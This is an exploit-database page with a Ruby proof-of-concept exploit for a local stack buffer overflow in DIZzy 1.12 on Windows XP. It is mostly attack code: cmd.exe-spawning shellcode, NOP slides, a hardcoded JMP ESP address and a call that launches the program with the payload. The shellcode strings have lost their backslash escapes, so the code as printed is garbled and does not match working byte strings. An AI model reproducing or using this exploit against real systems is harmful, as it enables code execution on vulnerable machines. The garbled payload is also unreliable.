[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : DIZzy 1.12 Local Stack Overflow
# Published : 2010-11-18
# Author : g30rg3_x
# Previous Title : MP3-Nator Buffer Overflow (SEH - DEP BYPASS)
# Next Title : Minishare 1.5.5 BoF Vulnerability (users.txt) - EggHunter -
#!/usr/bin/ruby
# Exploit Title: DIZzy 1.12 Local Stack Overflow
# Google Dork: n/a
# Date: 17/11/2010
# Author: g30rg3_x
# Version: 1.12
# Tested on: Windows XP SP3 Eng/Spa
# CVE: n/a
# Notes: Bug was originally found on 22/02/2010 but since there is no response from
# developers it goes public.
# win32/xp sp2 cmd.exe 57 bytes - Mountassif Moad aka Stack
# http://www.exploit-db.com/exploits/13511/
shellcode = "xB8xFFxEFxFFxFFxF7xD0x2BxE0x55x8BxEC" +
"x33xFFx57x83xECx04xC6x45xF8x63xC6x45" +
"xF9x6DxC6x45xFAx64xC6x45xFBx2ExC6x45" +
"xFCx65xC6x45xFDx78xC6x45xFEx65x8Dx45" +
"xF8x50xBBxC7x93xBFx77xFFxD3"
# Preparing the exploit...
nop_slide = "x90" * 284
nop_slide2 = "x90" * 17
jmp_esp = "x73x18x6Ex74" # win32/xp sp3 MSCTF.dll: JMP ESP
exploit = nop_slide + jmp_esp + nop_slide2 + shellcode
executable = 'dizzy.exe'
# Boom!
exec(executable, exploit)